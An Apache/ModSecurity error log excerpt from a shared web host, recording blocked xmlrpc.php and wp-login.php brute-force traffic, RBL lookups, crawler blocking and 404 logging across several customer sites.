[Tue May 26 19:30:40.786249 2026] [security2:error] [pid 58470:tid 58693] [client 91.245.236.124:54431] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWniLnjVHRH3AGGvmb39gAAAF0"]
[Tue May 26 19:30:41.563723 2026] [security2:error] [pid 58470:tid 58601] [client 91.245.236.124:18471] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnibnjVHRH3AGGvmb4DwAAAAE"]
[Tue May 26 19:30:41.563863 2026] [security2:error] [pid 58470:tid 58601] [client 91.245.236.124:18471] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnibnjVHRH3AGGvmb4DwAAAAE"]
[Tue May 26 19:30:41.888244 2026] [security2:error] [pid 58470:tid 58619] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnibnjVHRH3AGGvmb4DgAAABM"]
[Tue May 26 19:30:42.025697 2026] [security2:error] [pid 58470:tid 58478] [remote 216.251.35.203:24504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.35.251.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWnibnjVHRH3AGGvmb4FAAAfwc"]
[Tue May 26 19:30:42.333267 2026] [security2:error] [pid 58470:tid 58649] [client 91.245.236.124:61487] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnirnjVHRH3AGGvmb4JQAAADE"]
[Tue May 26 19:30:42.333422 2026] [security2:error] [pid 58470:tid 58649] [client 91.245.236.124:61487] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnirnjVHRH3AGGvmb4JQAAADE"]
[Tue May 26 19:30:42.382201 2026] [security2:error] [pid 58470:tid 58479] [remote 121.200.216.55:34980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnirnjVHRH3AGGvmb4HgAABwg"]
[Tue May 26 19:30:42.394698 2026] [security2:error] [pid 58470:tid 58483] [remote 216.251.35.203:24504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.35.251.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWnirnjVHRH3AGGvmb4KQAATAw"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 19:30:43.112396 2026] [security2:error] [pid 58470:tid 58701] [client 91.245.236.124:51803] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWni7njVHRH3AGGvmb4PQAAAGU"]
[Tue May 26 19:30:43.112534 2026] [security2:error] [pid 58470:tid 58701] [client 91.245.236.124:51803] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWni7njVHRH3AGGvmb4PQAAAGU"]
[Tue May 26 19:30:43.882546 2026] [security2:error] [pid 58470:tid 58622] [client 91.245.236.124:22055] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWni7njVHRH3AGGvmb4UwAAABY"]
[Tue May 26 19:30:43.882700 2026] [security2:error] [pid 58470:tid 58622] [client 91.245.236.124:22055] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWni7njVHRH3AGGvmb4UwAAABY"]
[Tue May 26 19:30:44.074266 2026] [security2:error] [pid 58470:tid 58639] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWni7njVHRH3AGGvmb4TQAAACc"]
[Tue May 26 19:30:44.257205 2026] [security2:error] [pid 58470:tid 58496] [remote 216.251.35.203:46566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.35.251.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnjLnjVHRH3AGGvmb4XQAAPBk"]
[Tue May 26 19:30:44.648095 2026] [security2:error] [pid 58470:tid 58651] [client 91.245.236.124:32963] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnjLnjVHRH3AGGvmb4aQAAADM"]
[Tue May 26 19:30:44.648236 2026] [security2:error] [pid 58470:tid 58651] [client 91.245.236.124:32963] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnjLnjVHRH3AGGvmb4aQAAADM"]
[Tue May 26 19:30:44.924908 2026] [security2:error] [pid 58470:tid 58499] [remote 168.63.79.147:51784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWnjLnjVHRH3AGGvmb4agAAIBw"]
[Tue May 26 19:30:45.415024 2026] [security2:error] [pid 58470:tid 58638] [client 91.245.236.124:15419] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnjbnjVHRH3AGGvmb4fAAAACY"]
[Tue May 26 19:30:45.415177 2026] [security2:error] [pid 58470:tid 58638] [client 91.245.236.124:15419] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnjbnjVHRH3AGGvmb4fAAAACY"]
[Tue May 26 19:30:45.653237 2026] [security2:error] [pid 58470:tid 58709] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnjbnjVHRH3AGGvmb4dwAAAG0"]
[Tue May 26 19:30:46.183279 2026] [security2:error] [pid 58470:tid 58694] [client 91.245.236.124:46297] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnjrnjVHRH3AGGvmb4jAAAAF4"]
[Tue May 26 19:30:46.183381 2026] [security2:error] [pid 58470:tid 58694] [client 91.245.236.124:46297] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnjrnjVHRH3AGGvmb4jAAAAF4"]
[Tue May 26 19:30:46.827702 2026] [security2:error] [pid 58470:tid 58592] [remote 168.63.79.147:51784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWnjrnjVHRH3AGGvmb4nAAARXk"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 19:30:47.058779 2026] [security2:error] [pid 58470:tid 58683] [client 91.245.236.124:43891] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnj7njVHRH3AGGvmb4owAAAFM"]
[Tue May 26 19:30:47.058942 2026] [security2:error] [pid 58470:tid 58683] [client 91.245.236.124:43891] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnj7njVHRH3AGGvmb4owAAAFM"]
[Tue May 26 19:30:47.092715 2026] [security2:error] [pid 58470:tid 58509] [remote 18.190.7.192:50128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnjrnjVHRH3AGGvmb4oQAAOiY"]
[Tue May 26 19:30:47.383700 2026] [security2:error] [pid 58470:tid 58593] [remote 18.190.7.192:50128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnj7njVHRH3AGGvmb4rAAAJno"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 19:30:47.824770 2026] [security2:error] [pid 58470:tid 58619] [client 91.245.236.124:13073] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnj7njVHRH3AGGvmb4wQAAABM"]
[Tue May 26 19:30:47.824886 2026] [security2:error] [pid 58470:tid 58619] [client 91.245.236.124:13073] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnj7njVHRH3AGGvmb4wQAAABM"]
[Tue May 26 19:30:47.862568 2026] [security2:error] [pid 58470:tid 58627] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnj7njVHRH3AGGvmb4sQAAABs"]
[Tue May 26 19:30:48.262703 2026] [security2:error] [pid 58470:tid 58721] [client 172.241.20.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnkLnjVHRH3AGGvmb4yQAAAHk"], referer: https://www.anujtradingco.com/
[Tue May 26 19:30:48.586869 2026] [security2:error] [pid 58470:tid 58630] [client 91.245.236.124:64489] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnkLnjVHRH3AGGvmb43AAAAB4"]
[Tue May 26 19:30:48.586986 2026] [security2:error] [pid 58470:tid 58630] [client 91.245.236.124:64489] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnkLnjVHRH3AGGvmb43AAAAB4"]
[Tue May 26 19:30:48.724204 2026] [security2:error] [pid 58470:tid 58655] [client 172.241.20.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnkLnjVHRH3AGGvmb43wAAADc"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1513718&moderation-hash=be3232afec1c81fc37d209726442fe49
[Tue May 26 19:30:49.351287 2026] [security2:error] [pid 58470:tid 58725] [client 91.245.236.124:64629] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnkbnjVHRH3AGGvmb49wAAAH0"]
[Tue May 26 19:30:49.351416 2026] [security2:error] [pid 58470:tid 58725] [client 91.245.236.124:64629] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnkbnjVHRH3AGGvmb49wAAAH0"]
[Tue May 26 19:30:50.610959 2026] [security2:error] [pid 58470:tid 58709] [client 91.245.236.124:38809] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnkrnjVHRH3AGGvmb5FQAAAG0"]
[Tue May 26 19:30:50.611111 2026] [security2:error] [pid 58470:tid 58709] [client 91.245.236.124:38809] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnkrnjVHRH3AGGvmb5FQAAAG0"]
[Tue May 26 19:30:50.898214 2026] [security2:error] [pid 58470:tid 58686] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnkrnjVHRH3AGGvmb5IgAAAFY"]
[Tue May 26 19:30:51.044552 2026] [security2:error] [pid 58470:tid 58528] [remote 217.112.89.35:59350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWnkrnjVHRH3AGGvmb5LwAAaTk"]
[Tue May 26 19:30:51.187473 2026] [security2:error] [pid 58470:tid 58720] [client 202.76.171.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnkrnjVHRH3AGGvmb5KwAAAHg"]
[Tue May 26 19:30:51.214811 2026] [security2:error] [pid 58470:tid 58659] [client 184.82.168.113:37289] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahWnkrnjVHRH3AGGvmb5MQAAADs"]
[Tue May 26 19:30:51.392324 2026] [security2:error] [pid 58470:tid 58601] [client 91.245.236.124:25717] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnk7njVHRH3AGGvmb5QgAAAAE"]
[Tue May 26 19:30:51.392438 2026] [security2:error] [pid 58470:tid 58601] [client 91.245.236.124:25717] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnk7njVHRH3AGGvmb5QgAAAAE"]
[Tue May 26 19:30:51.459143 2026] [security2:error] [pid 58470:tid 58530] [remote 217.112.89.35:59350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWnk7njVHRH3AGGvmb5RAAAQTs"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 19:30:51.551524 2026] [security2:error] [pid 58470:tid 58639] [client 85.208.96.201:28144] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-21st/list/"] [unique_id "ahWnk7njVHRH3AGGvmb5SgAAACc"]
[Tue May 26 19:30:51.551701 2026] [security2:error] [pid 58470:tid 58639] [client 85.208.96.201:28144] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-21st/list/"] [unique_id "ahWnk7njVHRH3AGGvmb5SgAAACc"]
[Tue May 26 19:30:52.155616 2026] [security2:error] [pid 58470:tid 58622] [client 91.245.236.124:36497] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnlLnjVHRH3AGGvmb5WAAAABY"]
[Tue May 26 19:30:52.155771 2026] [security2:error] [pid 58470:tid 58622] [client 91.245.236.124:36497] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnlLnjVHRH3AGGvmb5WAAAABY"]
[Tue May 26 19:30:52.414158 2026] [security2:error] [pid 58470:tid 58659] [client 184.82.168.113:37289] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahWnkrnjVHRH3AGGvmb5MQAAADs"]
[Tue May 26 19:30:52.414257 2026] [security2:error] [pid 58470:tid 58659] [client 184.82.168.113:37289] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahWnkrnjVHRH3AGGvmb5MQAAADs"]
[Tue May 26 19:30:52.919171 2026] [security2:error] [pid 58470:tid 58608] [client 91.245.236.124:26943] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnlLnjVHRH3AGGvmb5jQAAAAg"]
[Tue May 26 19:30:52.919287 2026] [security2:error] [pid 58470:tid 58608] [client 91.245.236.124:26943] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnlLnjVHRH3AGGvmb5jQAAAAg"]
[Tue May 26 19:30:53.240354 2026] [security2:error] [pid 58470:tid 58571] [remote 168.63.79.147:51774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnlbnjVHRH3AGGvmb5lAAAUGQ"]
[Tue May 26 19:30:53.655067 2026] [security2:error] [pid 58470:tid 58600] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnlbnjVHRH3AGGvmb5nAAAAAA"]
[Tue May 26 19:30:53.685089 2026] [security2:error] [pid 58470:tid 58692] [client 91.245.236.124:61371] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnlbnjVHRH3AGGvmb5rgAAAFw"]
[Tue May 26 19:30:53.685243 2026] [security2:error] [pid 58470:tid 58692] [client 91.245.236.124:61371] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnlbnjVHRH3AGGvmb5rgAAAFw"]
[Tue May 26 19:30:54.461534 2026] [security2:error] [pid 58470:tid 58645] [client 91.245.236.124:35145] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnlrnjVHRH3AGGvmb5wwAAAC0"]
[Tue May 26 19:30:54.461692 2026] [security2:error] [pid 58470:tid 58645] [client 91.245.236.124:35145] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnlrnjVHRH3AGGvmb5wwAAAC0"]
[Tue May 26 19:30:54.655972 2026] [security2:error] [pid 58470:tid 58624] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnlrnjVHRH3AGGvmb5wAAAABg"]
[Tue May 26 19:30:54.691401 2026] [security2:error] [pid 58470:tid 58471] [remote 123.30.233.12:34712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnlrnjVHRH3AGGvmb5xAAAbQA"]
[Tue May 26 19:30:54.783925 2026] [fcgid:warn] [pid 58470:tid 58713] (70014)End of file found: [client 199.45.155.108:11064] mod_fcgid: can't get data from http client
[Tue May 26 19:30:55.106039 2026] [security2:error] [pid 58470:tid 58598] [remote 111.229.141.137:40100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnlrnjVHRH3AGGvmb51wAAVH8"]
[Tue May 26 19:30:55.225760 2026] [security2:error] [pid 58470:tid 58686] [client 91.245.236.124:50631] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnl7njVHRH3AGGvmb53wAAAFY"]
[Tue May 26 19:30:55.225879 2026] [security2:error] [pid 58470:tid 58686] [client 91.245.236.124:50631] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnl7njVHRH3AGGvmb53wAAAFY"]
